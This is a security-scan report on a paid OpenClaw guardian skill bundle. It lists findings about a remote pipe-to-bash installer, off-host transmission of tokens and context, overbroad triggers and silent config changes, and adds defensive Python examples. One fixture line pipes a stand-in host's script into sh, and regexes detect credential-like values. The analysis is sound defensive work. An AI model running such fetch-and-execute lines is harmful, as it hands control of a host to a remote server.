Openclaw Guardian

Security checks across malware telemetry and agentic risk

Overview

This paid OpenClaw guardian bundle has a coherent purpose, but installation delegates execution to opaque server-delivered shell code and makes persistent trust/configuration changes that need human review.

Install only if you trust both the publisher and skill.socialmore.net to supply code at install time. Prefer a signed, version-pinned bundle you can inspect before execution, review any allowBundled and route/config changes, avoid passing secrets or private paths to remote prompt execution, and test in an isolated OpenClaw profile before using it on a real environment.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Excessive Agency: Unrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Trigger Abuse: Overly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
  • MCP Tool Poisoning: Hidden Instructions, Unicode Deception, Parameter Description Injection
  • Prompt Injection: Instruction Override, Hidden Instructions, Exfiltration Commands
Findings (15)

Context-Inappropriate Capability

Severity: High | Confidence: 95%
The file is presented as a payment/license SDK, but it also includes `oc_prompt_skill`, which sends a license token and caller-supplied context to a remote `/api/skill/execute` endpoint for server-side execution. That expands the trust boundary beyond license verification into remote processing of user data, creating an undocumented exfiltration and remote-execution capability that operators may not expect from an auth helper.

Intent-Code Divergence

Severity: Medium | Confidence: 91%
The comment says AI runs on the server and results return locally, but the implementation also serializes arbitrary `key=value` arguments into JSON and transmits them as `context`. This can leak local file paths, prompts, identifiers, or other sensitive operator-supplied data to the vendor service without prominent disclosure at the call site.

Intent-Code Divergence

Severity: Medium | Confidence: 95%
The skill declares that Steps 0-5 must never be skipped once triggered, but later introduces a whitelist path that bypasses the mandatory security review for certain packages. This creates a trust-based exception that attackers can exploit through package impersonation, author spoofing, or compromise of a supposedly trusted package, undermining the core safety guarantee the skill claims to enforce.

Vague Triggers

Severity: Medium | Confidence: 87%
The trigger conditions are broad enough to activate on ordinary requests about stability, rollback, repair, or context compression, which can cause the skill to run in situations the user did not explicitly intend. In a skill that leads to shell-based installation and system modification, overbroad activation materially increases the chance of unsafe or surprise execution paths.

Vague Triggers

Severity: Medium | Confidence: 88%
The manifest trigger phrases include generic terms such as '全能守护' (all-round guardian), '稳定性套件' (stability suite), and '运维套件' (operations suite), making accidental invocation more likely during normal admin conversations. Since the skill's primary action is to fetch and run a shell script from a remote server, ambiguous triggers expand exposure to risky behavior without clear user consent.

Missing User Warnings

Severity: Medium | Confidence: 98%
The installation command fetches a script from a remote URL and pipes it straight into bash, and the documentation provides no warning, no verification step (pinned version, checksum, or signature), and no description of system effects. This enables immediate arbitrary code execution from the network: compromise of the server, the URL path, or the script contents is directly equivalent to compromise of the host.

Missing User Warnings

Severity: Medium | Confidence: 90%
`oc_execute_skill` decrypts server-fetched content and pipes it directly into `bash`, meaning the remote server effectively controls code execution on the local machine. Because there is no clear warning or confirmation at the execution point, users may invoke it as a normal SDK helper without realizing it executes remotely delivered shell code.
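The pinned-bundle advice in the Overview, the whitelist-bypass finding, and the two pipe-to-bash findings above all come down to one check: execute only bytes whose digest you have already reviewed, never whatever the URL serves today. The Python below is an added example, not the bundle's SDK and not its `oc_execute_skill`: it keys an allowlist by SHA-256 digest rather than by package name, and stages a script for inspection without running it. The script contents, package name and version are constructed fixtures.

```python
"""Pin-then-stage: refuse to hand a remotely supplied install script to a shell
unless its digest matches an entry in a reviewed allowlist.

Added example, not the bundle's own code. The script bytes, package name and
version are constructed fixtures; only the flow (fetch -> verify digest ->
stage for review -> explicit execute) is the point."""
import hashlib
import os
import tempfile
from typing import Dict, Iterable, Optional, Tuple

# Constructed: the script an operator has read and pinned.
REVIEWED_SCRIPT = b"#!/bin/sh\nset -eu\necho 'installing guardian bundle'\n"
# Constructed: what a compromised server, path or CDN could serve under the
# same URL. Same name, same author field, different bytes.
TAMPERED_SCRIPT = REVIEWED_SCRIPT + b"curl -fsSL https://example.invalid/x | sh\n"


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_allowlist(entries: Iterable[Tuple[str, str, str]]) -> Dict[str, Tuple[str, str]]:
    """Allowlist keyed by artifact digest -> (name, version).

    Keying by name or author is the 'whitelist path' weakness: anything that
    claims the trusted name inherits the bypass. A digest key only matches the
    exact bytes that were reviewed."""
    return {digest: (name, version) for name, version, digest in entries}


def is_allowlisted_by_name(allowlist: Dict[str, Tuple[str, str]], name: str) -> bool:
    """The weak check: true for any artifact that merely claims the name."""
    return any(n == name for n, _ in allowlist.values())


def is_allowlisted_by_digest(allowlist: Dict[str, Tuple[str, str]], data: bytes) -> bool:
    """The strong check: true only for the reviewed bytes."""
    return sha256_hex(data) in allowlist


def stage_for_review(data: bytes, allowlist: Dict[str, Tuple[str, str]],
                     dest_dir: Optional[str] = None) -> Optional[str]:
    """Write the script to disk for inspection only if its digest is pinned.

    Returns the staged path, or None when the bytes are not the reviewed ones.
    Nothing here executes the script: running it stays a separate, deliberate
    step (for example `sh "$path"` after reading it) instead of `curl URL | bash`."""
    if not is_allowlisted_by_digest(allowlist, data):
        return None
    dest_dir = dest_dir or tempfile.mkdtemp(prefix="oc-review-")
    path = os.path.join(dest_dir, "install.sh")
    with open(path, "wb") as fh:
        fh.write(data)
    os.chmod(path, 0o600)  # readable by the reviewer, deliberately not executable
    return path
```

The name-keyed check passes for the tampered bytes exactly as it does for the reviewed ones; the digest-keyed check, and therefore `stage_for_review`, does not. Executing the staged file remains a separate command the operator types after reading it.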

Missing User Warnings

Severity: Medium | Confidence: 89%
The server-side prompt execution path posts both the license token and user-supplied context to a remote endpoint without an explicit runtime disclosure. In an agent setting, operators may assume a local helper is being used, while sensitive inputs are actually transmitted off-host to a third party.
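For the three findings about `oc_prompt_skill` (license token plus caller-supplied `key=value` context posted to `/api/skill/execute` with no runtime disclosure), the practical control is a scrub step between parsing the arguments and serializing them, plus a one-line disclosure of what is about to leave the host. The Python below is an added example, not the SDK's code: the helper names, the regular expressions and the sample arguments are constructed, and the denylist patterns are starting points rather than a complete secret detector.

```python
"""Scrub caller-supplied key=value context before it is serialized and posted
off-host for server-side prompt execution, and produce the runtime disclosure
the helper lacks.

Added example, not the SDK's `oc_prompt_skill`. Helper names, regexes and the
sample arguments are constructed; the endpoint path and the fact that the
license token travels with the context come from the findings above."""
import json
import re
from typing import Dict, List, Tuple

ENDPOINT_PATH = "/api/skill/execute"

# Keys that must never leave the host, whatever their value.
DENIED_KEY_RE = re.compile(r"(token|secret|passw(or)?d|api[_-]?key|private)", re.I)
# Values that look like credentials even under an innocent key (constructed
# shapes of common key formats; extend for your environment).
SECRET_VALUE_RE = re.compile(
    r"^(sk-[A-Za-z0-9]{8,}|ghp_[A-Za-z0-9]{20,}|AKIA[0-9A-Z]{16}"
    r"|ey[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+)$"
)
# Values that reveal local filesystem layout (POSIX, ~ and Windows drive paths).
LOCAL_PATH_RE = re.compile(r"^(~?/|[A-Za-z]:\\)")


def parse_kv_args(args: List[str]) -> Dict[str, str]:
    """Parse positional key=value arguments into a dict (last key wins)."""
    ctx: Dict[str, str] = {}
    for arg in args:
        if "=" not in arg:
            raise ValueError(f"expected key=value, got {arg!r}")
        key, value = arg.split("=", 1)
        ctx[key.strip()] = value
    return ctx


def scrub_context(ctx: Dict[str, str]) -> Tuple[Dict[str, str], Dict[str, str]]:
    """Split context into (allowed, withheld); withheld maps key -> reason."""
    allowed: Dict[str, str] = {}
    withheld: Dict[str, str] = {}
    for key, value in ctx.items():
        if DENIED_KEY_RE.search(key):
            withheld[key] = "denied key"
        elif SECRET_VALUE_RE.match(value):
            withheld[key] = "credential-like value"
        elif LOCAL_PATH_RE.match(value):
            withheld[key] = "local filesystem path"
        else:
            allowed[key] = value
    return allowed, withheld


def build_remote_request(args: List[str], license_token: str) -> Dict[str, object]:
    """Build what would be POSTed to the vendor plus a disclosure line for the
    operator. Only the scrubbed context and the license token go off-host."""
    allowed, withheld = scrub_context(parse_kv_args(args))
    body = json.dumps({"license": license_token, "context": allowed}, sort_keys=True)
    disclosure = (
        f"POST {ENDPOINT_PATH}: sending license token and {len(allowed)} context "
        f"field(s) off-host ({', '.join(sorted(allowed)) or 'none'}); "
        f"withheld: {', '.join(sorted(withheld)) or 'none'}"
    )
    return {"body": body, "allowed": allowed, "withheld": withheld, "disclosure": disclosure}
```

The disclosure string is what the finding says is missing at the call site: print it (or require confirmation on it) before the request is sent, so an operator who thought the helper was local sees the endpoint and the field names.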

Natural-Language Policy Violations

Severity: Medium | Confidence: 84%
The SDK queries a remote endpoint with `Accept-Language` and relies on IP-derived region detection to select a payment method by default, without prior opt-in. While not direct code execution, it unnecessarily discloses locale metadata and makes behavior depend on network-observed geography, which is privacy-invasive and can steer payment flows without transparent consent.

Missing User Warnings

Severity: Medium | Confidence: 91%
The skill explicitly describes automatic rollback and file-system-watch-triggered handling of configuration changes, but it does not provide a prominent warning that user files may be modified automatically. In a config-management skill targeting files under ~/.openclaw/, undocumented automatic writes increase the risk of surprising state changes, unintended rollback of legitimate edits, and hard-to-audit behavior.

Missing User Warnings

Severity: Medium | Confidence: 94%
The alerting matrix references Telegram and Signal notifications for configuration-related failures, but there is no privacy notice describing what data may be sent to external services. Because config events can contain filenames, paths, diffs, health details, or other operational metadata, this creates a real risk of unintended data disclosure to third-party channels.

Vague Triggers

Severity: Medium | Confidence: 86%
The trigger phrases are broad enough that ordinary user requests about installing or reviewing a skill may automatically invoke this workflow, including installation and later configuration changes. Overbroad triggering increases the chance of unintended execution of sensitive actions and makes social engineering easier because a casual phrase can activate a privileged install path.

Missing User Warnings

Severity: Medium | Confidence: 90%
The skill includes commands that back up and then modify the user's local OpenClaw configuration by writing to allowBundled, but the document does not prominently warn that local configuration state will be changed. This can weaken user awareness and consent around persistence-related changes, especially because allowlisting may reduce future scrutiny of the installed skill.
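Because the install step backs up and then rewrites local configuration, the review this finding asks for (and the Overview's "review any allowBundled and route/config changes") is easiest as a snapshot-and-diff around the install. The Python below is an added example, not the skill's own backup/modify commands: it flattens two constructed config snapshots and routes changes to `allowBundled` and to a hypothetical `routes` section into a needs-review bucket. Only the `allowBundled` key comes from the page; the `routes` and `ui` keys and all sample values are assumptions.

```python
"""Snapshot-and-diff for the local OpenClaw configuration around a skill
install, so that trust-relevant writes (allowBundled, route/endpoint settings)
surface for an explicit decision instead of silently persisting.

Added example, not the skill's commands. The config shape is a constructed
stand-in for a file under ~/.openclaw/: `allowBundled` is the key the finding
names; `routes` and `ui` are hypothetical neighbours included to show triage."""
import json
from typing import Any, Dict, List

# Top-level keys whose change must be approved by a human. Everything else is
# still reported, but treated as routine.
TRUST_RELEVANT_ROOTS = {"allowBundled", "routes"}

# Constructed before/after snapshots.
SAMPLE_BEFORE: Dict[str, Any] = {
    "allowBundled": ["core-tools"],
    "routes": {"prompt": "local"},
    "ui": {"theme": "dark"},
}
SAMPLE_AFTER: Dict[str, Any] = {
    "allowBundled": ["core-tools", "openclaw-guardian"],
    "routes": {"prompt": "https://skill.socialmore.net/api/skill/execute"},
    "ui": {"theme": "light"},
}

_MISSING = object()  # sentinel so a genuine None value is not confused with "absent"


def flatten(obj: Any, prefix: str = "") -> Dict[str, Any]:
    """Flatten nested dicts into dotted paths. Lists are kept whole so that
    allowlist-style arrays diff as added/removed members, not by index."""
    if isinstance(obj, dict):
        out: Dict[str, Any] = {}
        for key, value in obj.items():
            out.update(flatten(value, f"{prefix}.{key}" if prefix else key))
        return out
    return {prefix: obj}


def _show(value: Any) -> str:
    return "<absent>" if value is _MISSING else json.dumps(value, sort_keys=True)


def audit_config_change(before: Dict[str, Any], after: Dict[str, Any]) -> Dict[str, List[Dict[str, Any]]]:
    """Return {"needs_review": [...], "routine": [...]}; each entry carries path,
    old, new and, for list-valued settings, the members added and removed."""
    b, a = flatten(before), flatten(after)
    report: Dict[str, List[Dict[str, Any]]] = {"needs_review": [], "routine": []}
    for path in sorted(set(b) | set(a)):
        old, new = b.get(path, _MISSING), a.get(path, _MISSING)
        if old == new:
            continue
        entry: Dict[str, Any] = {"path": path, "old": _show(old), "new": _show(new)}
        if isinstance(old, list) and isinstance(new, list):
            entry["added"] = [x for x in new if x not in old]
            entry["removed"] = [x for x in old if x not in new]
        root = path.split(".", 1)[0]
        bucket = "needs_review" if root in TRUST_RELEVANT_ROOTS else "routine"
        report[bucket].append(entry)
    return report


def may_proceed_unattended(report: Dict[str, List[Dict[str, Any]]]) -> bool:
    """True only when nothing trust-relevant changed; otherwise stop and ask."""
    return not report["needs_review"]
```

Take the "before" snapshot from the backup the skill itself makes, run the audit against the live file afterwards, and treat a non-empty `needs_review` list as a hard stop: an added `allowBundled` entry is exactly the persistence change that will lower scrutiny of the skill later.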

Missing User Warnings

Severity: Medium | Confidence: 92%
The script recursively rewrites installed Python files in place with no dry-run mode, confirmation prompt, backup, or scoping safeguards beyond a caller-supplied target path. This can unexpectedly alter code under a user-provided directory, create integrity and maintenance problems, and make rollback difficult if the wrong path is supplied or if the tool is used in automation.

Missing User Warnings

Severity: Medium | Confidence: 95%
The watermark embeds a user identifier such as an email or username@hostname directly into source files, which may then be redistributed, committed, or exposed through support bundles and package archives. That creates a privacy leak and persistent attribution marker without any built-in notice, minimization, or consent mechanism.
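The last two findings describe the same script: a recursive in-place rewrite with no dry run, confinement or backup, stamping a raw user identifier into every file. The Python below is an added example of what such a rewriter looks like with those safeguards, not the bundle's script: the fixture files, the identifier, the salt and the `# oc-watermark:` line format are constructed, and the salted-hash marker is one minimization option shown for illustration, not a description of what the vendor does.

```python
"""An in-place source rewriter with the safeguards the findings say are
missing: dry run by default, confinement to the caller's root, symlink skip,
sidecar backups, atomic replace, and an idempotent transform. The transform
used here inserts a marker derived from the user identifier instead of the
raw email or username@hostname, as one minimization option.

Added example, not the bundle's script. File names, identifier, salt and the
`# oc-watermark: ...` format are constructed."""
import hashlib
import os
import tempfile
from pathlib import Path
from typing import Callable, Dict, List, Optional


def opaque_marker(identifier: str, salt: str) -> str:
    """Keyed hash of the identifier: whoever holds the salt can still map a
    leaked file back to an install; a stranger reading the file cannot recover
    the email. (Constructed scheme.)"""
    return hashlib.sha256(f"{salt}:{identifier}".encode("utf-8")).hexdigest()[:16]


def add_header(text: str, marker: str) -> str:
    """Prepend the marker line once; applying the transform twice is a no-op."""
    line = f"# oc-watermark: {marker}\n"
    return text if text.startswith(line) else line + text


def rewrite_tree(root: Path, transform: Callable[[str], str], *,
                 apply: bool = False, backup_dir: Optional[Path] = None) -> Dict[str, List]:
    """Rewrite every *.py under root with transform.

    apply=False (the default) only reports what would change. With apply=True
    each file is first copied under backup_dir (mirroring its relative path) and
    then replaced atomically. Symlinks and anything resolving outside root are
    skipped, so a stray link cannot drag the rewrite into another directory."""
    root = root.resolve(strict=True)
    report: Dict[str, List] = {"would_change": [], "changed": [], "skipped": []}
    for path in sorted(root.rglob("*.py")):
        if path.is_symlink():
            report["skipped"].append((str(path), "symlink"))
            continue
        real = path.resolve()
        if root != real and root not in real.parents:
            report["skipped"].append((str(path), "outside root"))
            continue
        old = path.read_text(encoding="utf-8")
        new = transform(old)
        if new == old:
            continue
        if not apply:
            report["would_change"].append(str(path))
            continue
        if backup_dir is not None:
            bak = Path(backup_dir) / real.relative_to(root)
            bak.parent.mkdir(parents=True, exist_ok=True)
            bak.write_text(old, encoding="utf-8")
        tmp = path.with_name(path.name + ".tmp")
        tmp.write_text(new, encoding="utf-8")
        os.replace(tmp, path)  # atomic on POSIX: never leaves a half-written file
        report["changed"].append(str(path))
    return report


def demo() -> Dict[str, object]:
    """Constructed fixture: a small package tree plus a symlink pointing outside it."""
    base = Path(tempfile.mkdtemp(prefix="oc-rewrite-"))
    pkg = base / "pkg"
    (pkg / "sub").mkdir(parents=True)
    (pkg / "a.py").write_text("print('a')\n", encoding="utf-8")
    (pkg / "sub" / "b.py").write_text("print('b')\n", encoding="utf-8")
    outside = base / "outside.py"
    outside.write_text("print('outside')\n", encoding="utf-8")
    try:
        (pkg / "link.py").symlink_to(outside)
    except OSError:
        pass  # platforms without symlink support simply skip that part of the demo
    marker = opaque_marker("alice@example.org", salt="constructed-salt")
    transform = lambda text: add_header(text, marker)
    dry = rewrite_tree(pkg, transform)                                   # reports only
    applied = rewrite_tree(pkg, transform, apply=True, backup_dir=base / "backup")
    again = rewrite_tree(pkg, transform, apply=True, backup_dir=base / "backup")  # no-op
    return {
        "marker": marker,
        "dry": dry, "applied": applied, "again": again,
        "a": (pkg / "a.py").read_text(encoding="utf-8"),
        "backup_a": (base / "backup" / "a.py").read_text(encoding="utf-8"),
        "outside": outside.read_text(encoding="utf-8"),
    }
```

Run `demo()` to see the three passes: the dry run lists two files and writes nothing, the applied run changes them and leaves pristine copies under the backup directory, and the second applied run finds nothing to do. The file outside the root is never touched even though a symlink inside the tree points at it.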

VirusTotal

66/66 vendors reported this skill as clean. A static scan of the bundle cannot cover the shell code the installer fetches from the server at install time, which is where the findings above place the risk.